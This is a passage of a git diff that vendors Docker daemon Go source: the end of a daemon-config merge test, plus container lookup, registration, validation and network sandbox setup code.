+			LogConfig: LogConfig{
+				Type:   "syslog",
+				Config: map[string]string{"tag": "test"},
+			},
+		},
+	}
+
+	cc, err := MergeDaemonConfigurations(c, nil, configFile)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !cc.Debug {
+		t.Fatalf("expected %v, got %v\n", true, cc.Debug)
+	}
+	if !cc.AutoRestart {
+		t.Fatalf("expected %v, got %v\n", true, cc.AutoRestart)
+	}
+	if cc.LogConfig.Type != "syslog" {
+		t.Fatalf("expected syslog config, got %q\n", cc.LogConfig)
+	}
+
+	if configValue, OK := cc.LogConfig.Config["tag"]; !OK {
+		t.Fatal("expected syslog config attributes, got nil\n")
+	} else {
+		if configValue != "test_tag" {
+			t.Fatalf("expected syslog config attributes 'tag=test_tag', got 'tag=%s'\n", configValue)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/container.go b/vendor/github.com/docker/docker/daemon/container.go
new file mode 100644
index 0000000000..2a44800098
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/container.go
@@ -0,0 +1,282 @@
+package daemon
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+	"time"
+
+	"github.com/docker/docker/api/errors"
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/strslice"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/network"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/pkg/signal"
+	"github.com/docker/docker/pkg/system"
+	"github.com/docker/docker/pkg/truncindex"
+	"github.com/docker/docker/runconfig/opts"
+	"github.com/docker/go-connections/nat"
+)
+
+// GetContainer looks for a container using the provided information, which could be
+// one of the following inputs from the caller:
+//  - A full container ID, which will exact match a container in daemon's list
+//  - A container name, which will only exact match via the GetByName() function
+//  - A partial container ID prefix (e.g. short ID) of any length that is
+//    unique enough to only return a single container object
+//  If none of these searches succeed, an error is returned
+func (daemon *Daemon) GetContainer(prefixOrName string) (*container.Container, error) {
+	if len(prefixOrName) == 0 {
+		return nil, errors.NewBadRequestError(fmt.Errorf("No container name or ID supplied"))
+	}
+
+	if containerByID := daemon.containers.Get(prefixOrName); containerByID != nil {
+		// prefix is an exact match to a full container ID
+		return containerByID, nil
+	}
+
+	// GetByName will match only an exact name provided; we ignore errors
+	if containerByName, _ := daemon.GetByName(prefixOrName); containerByName != nil {
+		// prefix is an exact match to a full container Name
+		return containerByName, nil
+	}
+
+	containerID, indexError := daemon.idIndex.Get(prefixOrName)
+	if indexError != nil {
+		// When truncindex defines an error type, use that instead
+		if indexError == truncindex.ErrNotExist {
+			err := fmt.Errorf("No such container: %s", prefixOrName)
+			return nil, errors.NewRequestNotFoundError(err)
+		}
+		return nil, indexError
+	}
+	return daemon.containers.Get(containerID), nil
+}
+
+// Exists returns a true if a container of the specified ID or name exists,
+// false otherwise.
+func (daemon *Daemon) Exists(id string) bool {
+	c, _ := daemon.GetContainer(id)
+	return c != nil
+}
+
+// IsPaused returns a bool indicating if the specified container is paused.
+func (daemon *Daemon) IsPaused(id string) bool {
+	c, _ := daemon.GetContainer(id)
+	return c.State.IsPaused()
+}
+
+func (daemon *Daemon) containerRoot(id string) string {
+	return filepath.Join(daemon.repository, id)
+}
+
+// Load reads the contents of a container from disk
+// This is typically done at startup.
+func (daemon *Daemon) load(id string) (*container.Container, error) {
+	container := daemon.newBaseContainer(id)
+
+	if err := container.FromDisk(); err != nil {
+		return nil, err
+	}
+
+	if container.ID != id {
+		return container, fmt.Errorf("Container %s is stored at %s", container.ID, id)
+	}
+
+	return container, nil
+}
+
+// Register makes a container object usable by the daemon as <container.ID>
+func (daemon *Daemon) Register(c *container.Container) error {
+	// Attach to stdout and stderr
+	if c.Config.OpenStdin {
+		c.StreamConfig.NewInputPipes()
+	} else {
+		c.StreamConfig.NewNopInputPipe()
+	}
+
+	daemon.containers.Add(c.ID, c)
+	daemon.idIndex.Add(c.ID)
+
+	return nil
+}
+
+func (daemon *Daemon) newContainer(name string, config *containertypes.Config, hostConfig *containertypes.HostConfig, imgID image.ID, managed bool) (*container.Container, error) {
+	var (
+		id             string
+		err            error
+		noExplicitName = name == ""
+	)
+	id, name, err = daemon.generateIDAndName(name)
+	if err != nil {
+		return nil, err
+	}
+
+	if hostConfig.NetworkMode.IsHost() {
+		if config.Hostname == "" {
+			config.Hostname, err = os.Hostname()
+			if err != nil {
+				return nil, err
+			}
+		}
+	} else {
+		daemon.generateHostname(id, config)
+	}
+	entrypoint, args := daemon.getEntrypointAndArgs(config.Entrypoint, config.Cmd)
+
+	base := daemon.newBaseContainer(id)
+	base.Created = time.Now().UTC()
+	base.Managed = managed
+	base.Path = entrypoint
+	base.Args = args //FIXME: de-duplicate from config
+	base.Config = config
+	base.HostConfig = &containertypes.HostConfig{}
+	base.ImageID = imgID
+	base.NetworkSettings = &network.Settings{IsAnonymousEndpoint: noExplicitName}
+	base.Name = name
+	base.Driver = daemon.GraphDriverName()
+
+	return base, err
+}
+
+// GetByName returns a container given a name.
+func (daemon *Daemon) GetByName(name string) (*container.Container, error) {
+	if len(name) == 0 {
+		return nil, fmt.Errorf("No container name supplied")
+	}
+	fullName := name
+	if name[0] != '/' {
+		fullName = "/" + name
+	}
+	id, err := daemon.nameIndex.Get(fullName)
+	if err != nil {
+		return nil, fmt.Errorf("Could not find entity for %s", name)
+	}
+	e := daemon.containers.Get(id)
+	if e == nil {
+		return nil, fmt.Errorf("Could not find container for entity id %s", id)
+	}
+	return e, nil
+}
+
+// newBaseContainer creates a new container with its initial
+// configuration based on the root storage from the daemon.
+func (daemon *Daemon) newBaseContainer(id string) *container.Container {
+	return container.NewBaseContainer(id, daemon.containerRoot(id))
+}
+
+func (daemon *Daemon) getEntrypointAndArgs(configEntrypoint strslice.StrSlice, configCmd strslice.StrSlice) (string, []string) {
+	if len(configEntrypoint) != 0 {
+		return configEntrypoint[0], append(configEntrypoint[1:], configCmd...)
+	}
+	return configCmd[0], configCmd[1:]
+}
+
+func (daemon *Daemon) generateHostname(id string, config *containertypes.Config) {
+	// Generate default hostname
+	if config.Hostname == "" {
+		config.Hostname = id[:12]
+	}
+}
+
+func (daemon *Daemon) setSecurityOptions(container *container.Container, hostConfig *containertypes.HostConfig) error {
+	container.Lock()
+	defer container.Unlock()
+	return parseSecurityOpt(container, hostConfig)
+}
+
+func (daemon *Daemon) setHostConfig(container *container.Container, hostConfig *containertypes.HostConfig) error {
+	// Do not lock while creating volumes since this could be calling out to external plugins
+	// Don't want to block other actions, like `docker ps` because we're waiting on an external plugin
+	if err := daemon.registerMountPoints(container, hostConfig); err != nil {
+		return err
+	}
+
+	container.Lock()
+	defer container.Unlock()
+
+	// Register any links from the host config before starting the container
+	if err := daemon.registerLinks(container, hostConfig); err != nil {
+		return err
+	}
+
+	// make sure links is not nil
+	// this ensures that on the next daemon restart we don't try to migrate from legacy sqlite links
+	if hostConfig.Links == nil {
+		hostConfig.Links = []string{}
+	}
+
+	container.HostConfig = hostConfig
+	return container.ToDisk()
+}
+
+// verifyContainerSettings performs validation of the hostconfig and config
+// structures.
+func (daemon *Daemon) verifyContainerSettings(hostConfig *containertypes.HostConfig, config *containertypes.Config, update bool) ([]string, error) {
+
+	// First perform verification of settings common across all platforms.
+	if config != nil {
+		if config.WorkingDir != "" {
+			config.WorkingDir = filepath.FromSlash(config.WorkingDir) // Ensure in platform semantics
+			if !system.IsAbs(config.WorkingDir) {
+				return nil, fmt.Errorf("the working directory '%s' is invalid, it needs to be an absolute path", config.WorkingDir)
+			}
+		}
+
+		if len(config.StopSignal) > 0 {
+			_, err := signal.ParseSignal(config.StopSignal)
+			if err != nil {
+				return nil, err
+			}
+		}
+
+		// Validate if Env contains empty variable or not (e.g., ``, `=foo`)
+		for _, env := range config.Env {
+			if _, err := opts.ValidateEnv(env); err != nil {
+				return nil, err
+			}
+		}
+	}
+
+	if hostConfig == nil {
+		return nil, nil
+	}
+
+	if hostConfig.AutoRemove && !hostConfig.RestartPolicy.IsNone() {
+		return nil, fmt.Errorf("can't create 'AutoRemove' container with restart policy")
+	}
+
+	for port := range hostConfig.PortBindings {
+		_, portStr := nat.SplitProtoPort(string(port))
+		if _, err := nat.ParsePort(portStr); err != nil {
+			return nil, fmt.Errorf("invalid port specification: %q", portStr)
+		}
+		for _, pb := range hostConfig.PortBindings[port] {
+			_, err := nat.NewPort(nat.SplitProtoPort(pb.HostPort))
+			if err != nil {
+				return nil, fmt.Errorf("invalid port specification: %q", pb.HostPort)
+			}
+		}
+	}
+
+	p := hostConfig.RestartPolicy
+
+	switch p.Name {
+	case "always", "unless-stopped", "no":
+		if p.MaximumRetryCount != 0 {
+			return nil, fmt.Errorf("maximum retry count cannot be used with restart policy '%s'", p.Name)
+		}
+	case "on-failure":
+		if p.MaximumRetryCount < 0 {
+			return nil, fmt.Errorf("maximum retry count cannot be negative")
+		}
+	case "":
+	// do nothing
+	default:
+		return nil, fmt.Errorf("invalid restart policy '%s'", p.Name)
+	}
+
+	// Now do platform-specific verification
+	return verifyPlatformContainerSettings(daemon, hostConfig, config, update)
+}
diff --git a/vendor/github.com/docker/docker/daemon/container_operations.go b/vendor/github.com/docker/docker/daemon/container_operations.go
new file mode 100644
index 0000000000..c30250622d
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/container_operations.go
@@ -0,0 +1,1049 @@
+package daemon
+
+import (
+	"errors"
+	"fmt"
+	"net"
+	"os"
+	"path"
+	"runtime"
+	"strings"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	derr "github.com/docker/docker/api/errors"
+	containertypes "github.com/docker/docker/api/types/container"
+	networktypes "github.com/docker/docker/api/types/network"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/network"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/runconfig"
+	"github.com/docker/go-connections/nat"
+	"github.com/docker/libnetwork"
+	"github.com/docker/libnetwork/netlabel"
+	"github.com/docker/libnetwork/options"
+	"github.com/docker/libnetwork/types"
+)
+
+var (
+	// ErrRootFSReadOnly is returned when a container
+	// rootfs is marked readonly.
+	ErrRootFSReadOnly = errors.New("container rootfs is marked read-only")
+	getPortMapInfo    = container.GetSandboxPortMapInfo
+)
+
+func (daemon *Daemon) buildSandboxOptions(container *container.Container) ([]libnetwork.SandboxOption, error) {
+	var (
+		sboxOptions []libnetwork.SandboxOption
+		err         error
+		dns         []string
+		dnsSearch   []string
+		dnsOptions  []string
+		bindings    = make(nat.PortMap)
+		pbList      []types.PortBinding
+		exposeList  []types.TransportPort
+	)
+
+	defaultNetName := runconfig.DefaultDaemonNetworkMode().NetworkName()
+	sboxOptions = append(sboxOptions, libnetwork.OptionHostname(container.Config.Hostname),
+		libnetwork.OptionDomainname(container.Config.Domainname))
+
+	if container.HostConfig.NetworkMode.IsHost() {
+		sboxOptions = append(sboxOptions, libnetwork.OptionUseDefaultSandbox())
+		if len(container.HostConfig.ExtraHosts) == 0 {
+			sboxOptions = append(sboxOptions, libnetwork.OptionOriginHostsPath("/etc/hosts"))
+		}
+		if len(container.HostConfig.DNS) == 0 && len(daemon.configStore.DNS) == 0 &&
+			len(container.HostConfig.DNSSearch) == 0 && len(daemon.configStore.DNSSearch) == 0 &&
+			len(container.HostConfig.DNSOptions) == 0 && len(daemon.configStore.DNSOptions) == 0 {
+			sboxOptions = append(sboxOptions, libnetwork.OptionOriginResolvConfPath("/etc/resolv.conf"))
+		}
+	} else {
+		// OptionUseExternalKey is mandatory for userns support.
+		// But optional for non-userns support
+		sboxOptions = append(sboxOptions, libnetwork.OptionUseExternalKey())
+	}
+
+	if err = setupPathsAndSandboxOptions(container, &sboxOptions); err != nil {
+		return nil, err
+	}
+
+	if len(container.HostConfig.DNS) > 0 {
+		dns = container.HostConfig.DNS
+	} else if len(daemon.configStore.DNS) > 0 {
+		dns = daemon.configStore.DNS
+	}
+
+	for _, d := range dns {
+		sboxOptions = append(sboxOptions, libnetwork.OptionDNS(d))
+	}
+
+	if len(container.HostConfig.DNSSearch) > 0 {
+		dnsSearch = container.HostConfig.DNSSearch
+	} else if len(daemon.configStore.DNSSearch) > 0 {
+		dnsSearch = daemon.configStore.DNSSearch
+	}
+
+	for _, ds := range dnsSearch {
+		sboxOptions = append(sboxOptions, libnetwork.OptionDNSSearch(ds))
+	}
+
+	if len(container.HostConfig.DNSOptions) > 0 {
+		dnsOptions = container.HostConfig.DNSOptions
+	} else if len(daemon.configStore.DNSOptions) > 0 {
+		dnsOptions = daemon.configStore.DNSOptions
+	}
+
+	for _, ds := range dnsOptions {
+		sboxOptions = append(sboxOptions, libnetwork.OptionDNSOptions(ds))
+	}
+
+	if container.NetworkSettings.SecondaryIPAddresses != nil {
+		name := container.Config.Hostname
+		if container.Config.Domainname != "" {
+			name = name + "." + container.Config.Domainname
+		}
+
+		for _, a := range container.NetworkSettings.SecondaryIPAddresses {
+			sboxOptions = append(sboxOptions, libnetwork.OptionExtraHost(name, a.Addr))
+		}
+	}
+
+	for _, extraHost := range container.HostConfig.ExtraHosts {
+		// allow IPv6 addresses in extra hosts; only split on first ":"
+		parts := strings.SplitN(extraHost, ":", 2)
+		sboxOptions = append(sboxOptions, libnetwork.OptionExtraHost(parts[0], parts[1]))
+	}
+
+	if container.HostConfig.PortBindings != nil {
+		for p, b := range container.HostConfig.PortBindings {
+			bindings[p] = []nat.PortBinding{}
+			for _, bb := range b {
+				bindings[p] = append(bindings[p], nat.PortBinding{
+					HostIP:   bb.HostIP,
+					HostPort: bb.HostPort,
+				})
+			}
+		}
+	}
+
+	portSpecs := container.Config.ExposedPorts
+	ports := make([]nat.Port, len(portSpecs))
+	var i int
+	for p := range portSpecs {
+		ports[i] = p
+		i++
+	}
+	nat.SortPortMap(ports, bindings)
+	for _, port := range ports {
+		expose := types.TransportPort{}
+		expose.Proto = types.ParseProtocol(port.Proto())
+		expose.Port = uint16(port.Int())
+		exposeList = append(exposeList, expose)
+
+		pb := types.PortBinding{Port: expose.Port, Proto: expose.Proto}
+		binding := bindings[port]
+		for i := 0; i < len(binding); i++ {
+			pbCopy := pb.GetCopy()
+			newP, err := nat.NewPort(nat.SplitProtoPort(binding[i].HostPort))
+			var portStart, portEnd int
+			if err == nil {
+				portStart, portEnd, err = newP.Range()
+			}
+			if err != nil {
+				return nil, fmt.Errorf("Error parsing HostPort value(%s):%v", binding[i].HostPort, err)
+			}
+			pbCopy.HostPort = uint16(portStart)
+			pbCopy.HostPortEnd = uint16(portEnd)
+			pbCopy.HostIP = net.ParseIP(binding[i].HostIP)
+			pbList = append(pbList, pbCopy)
+		}
+
+		if container.HostConfig.PublishAllPorts && len(binding) == 0 {
+			pbList = append(pbList, pb)
+		}
+	}
+
+	sboxOptions = append(sboxOptions,
+		libnetwork.OptionPortMapping(pbList),
+		libnetwork.OptionExposedPorts(exposeList))
+
+	// Legacy Link feature is supported only for the default bridge network.
+	// return if this call to build join options is not for default bridge network
+	// Legacy Link is only supported by docker run --link
+	bridgeSettings, ok := container.NetworkSettings.Networks[defaultNetName]
+	if !ok || bridgeSettings.EndpointSettings == nil {
+		return sboxOptions, nil
+	}
+
+	if bridgeSettings.EndpointID == "" {
+		return sboxOptions, nil
+	}
+
+	var (
+		childEndpoints, parentEndpoints []string
+		cEndpointID                     string
+	)
+
+	children := daemon.children(container)
+	for linkAlias, child := range children {
+		if !isLinkable(child) {
+			return nil, fmt.Errorf("Cannot link to %s, as it does not belong to the default network", child.Name)
+		}
+		_, alias := path.Split(linkAlias)
+		// allow access to the linked container via the alias, real name, and container hostname
+		aliasList := alias + " " + child.Config.Hostname
+		// only add the name if alias isn't equal to the name
+		if alias != child.Name[1:] {
+			aliasList = aliasList + " " + child.Name[1:]
+		}
+		sboxOptions = append(sboxOptions, libnetwork.OptionExtraHost(aliasList, child.NetworkSettings.Networks[defaultNetName].IPAddress))
+		cEndpointID = child.NetworkSettings.Networks[defaultNetName].EndpointID
+		if cEndpointID != "" {
+			childEndpoints = append(childEndpoints, cEndpointID)
+		}
+	}
+
+	for alias, parent := range daemon.parents(container) {
+		if daemon.configStore.DisableBridge || !container.HostConfig.NetworkMode.IsPrivate() {
+			continue
+		}
+
+		_, alias = path.Split(alias)
+		logrus.Debugf("Update /etc/hosts of %s for alias %s with ip %s", parent.ID, alias, bridgeSettings.IPAddress)
+		sboxOptions = append(sboxOptions, libnetwork.OptionParentUpdate(
+			parent.ID,
+			alias,
+			bridgeSettings.IPAddress,
+		))
+		if cEndpointID != "" {
+			parentEndpoints = append(parentEndpoints, cEndpointID)
+		}
+	}
+
+	linkOptions := options.Generic{
+		netlabel.GenericData: options.Generic{
+			"ParentEndpoints": parentEndpoints,
+			"ChildEndpoints":  childEndpoints,
+		},
+	}
+
+	sboxOptions = append(sboxOptions, libnetwork.OptionGeneric(linkOptions))
+	return sboxOptions, nil
+}
+
+func (daemon *Daemon) updateNetworkSettings(container *container.Container, n libnetwork.Network, endpointConfig *networktypes.EndpointSettings) error {
+	if container.NetworkSettings == nil {
+		container.NetworkSettings = &network.Settings{Networks: make(map[string]*network.EndpointSettings)}
+	}
+
+	if !container.HostConfig.NetworkMode.IsHost() && containertypes.NetworkMode(n.Type()).IsHost() {
+		return runconfig.ErrConflictHostNetwork
+	}
+
+	for s := range container.NetworkSettings.Networks {
+		sn, err := daemon.FindNetwork(s)
+		if err != nil {
+			continue
+		}
+
+		if sn.Name() == n.Name() {
+			// Avoid duplicate config
+			return nil
+		}
+		if !containertypes.NetworkMode(sn.Type()).IsPrivate() ||
+			!containertypes.NetworkMode(n.Type()).IsPrivate() {
+			return runconfig.ErrConflictSharedNetwork
+		}
+		if containertypes.NetworkMode(sn.Name()).IsNone() ||
+			containertypes.NetworkMode(n.Name()).IsNone() {
+			return runconfig.ErrConflictNoNetwork
+		}
+	}
+
+	if _, ok := container.NetworkSettings.Networks[n.Name()]; !ok {
+		container.NetworkSettings.Networks[n.Name()] = &network.EndpointSettings{
+			EndpointSettings: endpointConfig,
+		}
+	}
+
+	return nil
+}
+
+func (daemon *Daemon) updateEndpointNetworkSettings(container *container.Container, n libnetwork.Network, ep libnetwork.Endpoint) error {
+	if err := container.BuildEndpointInfo(n, ep); err != nil {
+		return err
+	}
+
+	if container.HostConfig.NetworkMode == runconfig.DefaultDaemonNetworkMode() {
+		container.NetworkSettings.Bridge = daemon.configStore.bridgeConfig.Iface
+	}
+
+	return nil
+}
+
+// UpdateNetwork is used to update the container's network (e.g. when linked containers
+// get removed/unlinked).
+func (daemon *Daemon) updateNetwork(container *container.Container) error {
+	var (
+		start = time.Now()
+		ctrl  = daemon.netController
+		sid   = container.NetworkSettings.SandboxID
+	)
+
+	sb, err := ctrl.SandboxByID(sid)
+	if err != nil {
+		return fmt.Errorf("error locating sandbox id %s: %v", sid, err)
+	}
+
+	// Find if container is connected to the default bridge network
+	var n libnetwork.Network
+	for name := range container.NetworkSettings.Networks {
+		sn, err := daemon.FindNetwork(name)
+		if err != nil {
+			continue
+		}
+		if sn.Name() == runconfig.DefaultDaemonNetworkMode().NetworkName() {
+			n = sn
+			break
+		}
+	}
+
+	if n == nil {
+		// Not connected to the default bridge network; Nothing to do
+		return nil
+	}
+
+	options, err := daemon.buildSandboxOptions(container)
+	if err != nil {
+		return fmt.Errorf("Update network failed: %v", err)
+	}
+
+	if err := sb.Refresh(options...); err != nil {
+		return fmt.Errorf("Update network failed: Failure in refresh sandbox %s: %v", sid, err)
+	}
+
+	networkActions.WithValues("update").UpdateSince(start)
+
+	return nil
+}
+
+func (daemon *Daemon) findAndAttachNetwork(container *container.Container, idOrName string, epConfig *networktypes.EndpointSettings) (libnetwork.Network, *networktypes.NetworkingConfig, error) {
+	n, err := daemon.FindNetwork(idOrName)
+	if err != nil {
+		// We should always be able to find the network for a
+		// managed container.
+		if container.Managed {
+			return nil, nil, err
+		}
+	}
+
+	// If we found a network and if it is not dynamically created
+	// we should never attempt to attach to that network here.
+	if n != nil {
+		if container.Managed || !n.Info().Dynamic() {
+			return n, nil, nil
+		}
+	}
+
+	var addresses []string
+	if epConfig != nil && epConfig.IPAMConfig != nil {
+		if epConfig.IPAMConfig.IPv4Address != "" {
+			addresses = append(addresses, epConfig.IPAMConfig.IPv4Address)
+		}
+
+		if epConfig.IPAMConfig.IPv6Address != "" {
+			addresses = append(addresses, epConfig.IPAMConfig.IPv6Address)
+		}
+	}
+
+	var (
+		config     *networktypes.NetworkingConfig
+		retryCount int
+	)
+
+	for {
+		// In all other cases, attempt to attach to the network to
+		// trigger attachment in the swarm cluster manager.
+		if daemon.clusterProvider != nil {
+			var err error
+			config, err = daemon.clusterProvider.AttachNetwork(idOrName, container.ID, addresses)
+			if err != nil {
+				return nil, nil, err
+			}
+		}
+
+		n, err = daemon.FindNetwork(idOrName)
+		if err != nil {
+			if daemon.clusterProvider != nil {
+				if err := daemon.clusterProvider.DetachNetwork(idOrName, container.ID); err != nil {
+					logrus.Warnf("Could not rollback attachment for container %s to network %s: %v", container.ID, idOrName, err)
+				}
+			}
+
+			// Retry network attach again if we failed to
+			// find the network after successfull
+			// attachment because the only reason that
+			// would happen is if some other container
+			// attached to the swarm scope network went down
+			// and removed the network while we were in
+			// the process of attaching.
+			if config != nil {
+				if _, ok := err.(libnetwork.ErrNoSuchNetwork); ok {
+					if retryCount >= 5 {
+						return nil, nil, fmt.Errorf("could not find network %s after successful attachment", idOrName)
+					}
+					retryCount++
+					continue
+				}
+			}
+
+			return nil, nil, err
+		}
+
+		break
+	}
+
+	// This container has attachment to a swarm scope
+	// network. Update the container network settings accordingly.
+	container.NetworkSettings.HasSwarmEndpoint = true
+	return n, config, nil
+}
+
+// updateContainerNetworkSettings update the network settings
+func (daemon *Daemon) updateContainerNetworkSettings(container *container.Container, endpointsConfig map[string]*networktypes.EndpointSettings) {
+	var n libnetwork.Network
+
+	mode := container.HostConfig.NetworkMode
+	if container.Config.NetworkDisabled || mode.IsContainer() {
+		return
+	}
+
+	networkName := mode.NetworkName()
+	if mode.IsDefault() {
+		networkName = daemon.netController.Config().Daemon.DefaultNetwork
+	}
+
+	if mode.IsUserDefined() {
+		var err error
+
+		n, err = daemon.FindNetwork(networkName)
+		if err == nil {
+			networkName = n.Name()
+		}
+	}
+
+	if container.NetworkSettings == nil {
+		container.NetworkSettings = &network.Settings{}
+	}
+
+	if len(endpointsConfig) > 0 {
+		if container.NetworkSettings.Networks == nil {
+			container.NetworkSettings.Networks = make(map[string]*network.EndpointSettings)
+		}
+
+		for name, epConfig := range endpointsConfig {
+			container.NetworkSettings.Networks[name] = &network.EndpointSettings{
+				EndpointSettings: epConfig,
+			}
+		}
+	}
+
+	if container.NetworkSettings.Networks == nil {
+		container.NetworkSettings.Networks = make(map[string]*network.EndpointSettings)
+		container.NetworkSettings.Networks[networkName] = &network.EndpointSettings{
+			EndpointSettings: &networktypes.EndpointSettings{},
+		}
+	}
+
+	// Convert any settings added by client in default name to
+	// engine's default network name key
+	if mode.IsDefault() {
+		if nConf, ok := container.NetworkSettings.Networks[mode.NetworkName()]; ok {
+			container.NetworkSettings.Networks[networkName] = nConf
+			delete(container.NetworkSettings.Networks, mode.NetworkName())
+		}
+	}
+
+	if !mode.IsUserDefined() {
+		return
+	}
+	// Make sure to internally store the per network endpoint config by network name
+	if _, ok := container.NetworkSettings.Networks[networkName]; ok {
+		return
+	}
+
+	if n != nil {
+		if nwConfig, ok := container.NetworkSettings.Networks[n.ID()]; ok {
+			container.NetworkSettings.Networks[networkName] = nwConfig
+			delete(container.NetworkSettings.Networks, n.ID())
+			return
+		}
+	}
+}
+
+func (daemon *Daemon) allocateNetwork(container *container.Container) error {
+	start := time.Now()
+	controller := daemon.netController
+
+	if daemon.netController == nil {
+		return nil
+	}
+
+	// Cleanup any stale sandbox left over due to ungraceful daemon shutdown
+	if err := controller.SandboxDestroy(container.ID); err != nil {
+		logrus.Errorf("failed to cleanup up stale network sandbox for container %s", container.ID)
+	}
+
+	updateSettings := false
+	if len(container.NetworkSettings.Networks) == 0 {
+		if container.Config.NetworkDisabled || container.HostConfig.NetworkMode.IsContainer() {
+			return nil
+		}
+
+		daemon.updateContainerNetworkSettings(container, nil)
+		updateSettings = true
+	}
+
+	// always connect default network first since only default
+	// network mode support link and we need do some setting
+	// on sandbox initialize for link, but the sandbox only be initialized
+	// on first network connecting.
+	defaultNetName := runconfig.DefaultDaemonNetworkMode().NetworkName()
+	if nConf, ok := container.NetworkSettings.Networks[defaultNetName]; ok {
+		cleanOperationalData(nConf)
+		if err := daemon.connectToNetwork(container, defaultNetName, nConf.EndpointSettings, updateSettings); err != nil {
+			return err
+		}
+
+	}
+
+	// the intermediate map is necessary because "connectToNetwork" modifies "container.NetworkSettings.Networks"
+	networks := make(map[string]*network.EndpointSettings)
+	for n, epConf := range container.NetworkSettings.Networks {
+		if n == defaultNetName {
+			continue
+		}
+
+		networks[n] = epConf
+	}
+
+	for netName, epConf := range networks {
+		cleanOperationalData(epConf)
+		if err := daemon.connectToNetwork(container, netName, epConf.EndpointSettings, updateSettings); err != nil {
+			return err
+		}
+	}
+
+	if err := container.WriteHostConfig(); err != nil {
+		return err
+	}
+	networkActions.WithValues("allocate").UpdateSince(start)
+	return nil
+}
+
+func (daemon *Daemon) getNetworkSandbox(container *container.Container) libnetwork.Sandbox {
+	var sb libnetwork.Sandbox
+	daemon.netController.WalkSandboxes(func(s libnetwork.Sandbox) bool {
+		if s.ContainerID() == container.ID {
+			sb = s
+			return true
+		}
+		return false
+	})
+	return sb
+}
+
+// hasUserDefinedIPAddress returns whether the passed endpoint configuration contains IP address configuration
+func hasUserDefinedIPAddress(epConfig *networktypes.EndpointSettings) bool {
+	return epConfig != nil && epConfig.IPAMConfig != nil && (len(epConfig.IPAMConfig.IPv4Address) > 0 || len(epConfig.IPAMConfig.IPv6Address) > 0)
+}
+
+// User specified ip address is acceptable only for networks with user specified subnets.
+func validateNetworkingConfig(n libnetwork.Network, epConfig *networktypes.EndpointSettings) error {
+	if n == nil || epConfig == nil {
+		return nil
+	}
+	if !hasUserDefinedIPAddress(epConfig) {
+		return nil
+	}
+	_, _, nwIPv4Configs, nwIPv6Configs := n.Info().IpamConfig()
+	for _, s := range []struct {
+		ipConfigured  bool
+		subnetConfigs []*libnetwork.IpamConf
+	}{
+		{
+			ipConfigured:  len(epConfig.IPAMConfig.IPv4Address) > 0,
+			subnetConfigs: nwIPv4Configs,
+		},
+		{
+			ipConfigured:  len(epConfig.IPAMConfig.IPv6Address) > 0,
+			subnetConfigs: nwIPv6Configs,
+		},
+	} {
+		if s.ipConfigured {
+			foundSubnet := false
+			for _, cfg := range s.subnetConfigs {
+				if len(cfg.PreferredPool) > 0 {
+					foundSubnet = true
+					break
+				}
+			}
+			if !foundSubnet {
+				return runconfig.ErrUnsupportedNetworkNoSubnetAndIP
+			}
+		}
+	}
+
+	return nil
+}
+
+// cleanOperationalData resets the operational data from the passed endpoint settings
+func cleanOperationalData(es *network.EndpointSettings) {
+	es.EndpointID = ""
+	es.Gateway = ""
+	es.IPAddress = ""
+	es.IPPrefixLen = 0
+	es.IPv6Gateway = ""
+	es.GlobalIPv6Address = ""
+	es.GlobalIPv6PrefixLen = 0
+	es.MacAddress = ""
+	if es.IPAMOperational {
+		es.IPAMConfig = nil
+	}
+}
+
+func (daemon *Daemon) updateNetworkConfig(container *container.Container, n libnetwork.Network, endpointConfig *networktypes.EndpointSettings, updateSettings bool) error {
+
+	if !containertypes.NetworkMode(n.Name()).IsUserDefined() {
+		if hasUserDefinedIPAddress(endpointConfig) && !enableIPOnPredefinedNetwork() {
+			return runconfig.ErrUnsupportedNetworkAndIP
+		}
+		if endpointConfig != nil && len(endpointConfig.Aliases) > 0 && !container.EnableServiceDiscoveryOnDefaultNetwork() {
+			return runconfig.ErrUnsupportedNetworkAndAlias
+		}
+	} else {
+		addShortID := true
+		shortID := stringid.TruncateID(container.ID)
+		for _, alias := range endpointConfig.Aliases {
+			if alias == shortID {
+				addShortID = false
+				break
+			}
+		}
+		if addShortID {
+			endpointConfig.Aliases = append(endpointConfig.Aliases, shortID)
+		}
+	}
+
+	if err := validateNetworkingConfig(n, endpointConfig); err != nil {
+		return err
+	}
+
+	if updateSettings {
+		if err := daemon.updateNetworkSettings(container, n, endpointConfig); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+func (daemon *Daemon) connectToNetwork(container *container.Container, idOrName string, endpointConfig *networktypes.EndpointSettings, updateSettings bool) (err error) {
+	start := time.Now()
+	if container.HostConfig.NetworkMode.IsContainer() {
+		return runconfig.ErrConflictSharedNetwork
+	}
+	if containertypes.NetworkMode(idOrName).IsBridge() &&
+		daemon.configStore.DisableBridge {
+		container.Config.NetworkDisabled = true
+		return nil
+	}
+	if endpointConfig == nil {
+		endpointConfig = &networktypes.EndpointSettings{}
+	}
+
+	n, config, err := daemon.findAndAttachNetwork(container, idOrName, endpointConfig)
+	if err != nil {
+		return err
+	}
+	if n == nil {
+		return nil
+	}
+
+	var operIPAM bool
+	if config != nil {
+		if epConfig, ok := config.EndpointsConfig[n.Name()]; ok {
+			if endpointConfig.IPAMConfig == nil ||
+				(endpointConfig.IPAMConfig.IPv4Address == "" &&
+					endpointConfig.IPAMConfig.IPv6Address == "" &&
+					len(endpointConfig.IPAMConfig.LinkLocalIPs) == 0) {
+				operIPAM = true
+			}
+
+			// copy IPAMConfig and NetworkID from epConfig via AttachNetwork
+			endpointConfig.IPAMConfig = epConfig.IPAMConfig
+			endpointConfig.NetworkID = epConfig.NetworkID
+		}
+	}
+
+	err = daemon.updateNetworkConfig(container, n, endpointConfig, updateSettings)
+	if err != nil {
+		return err
+	}
+
+	controller := daemon.netController
+	sb := daemon.getNetworkSandbox(container)
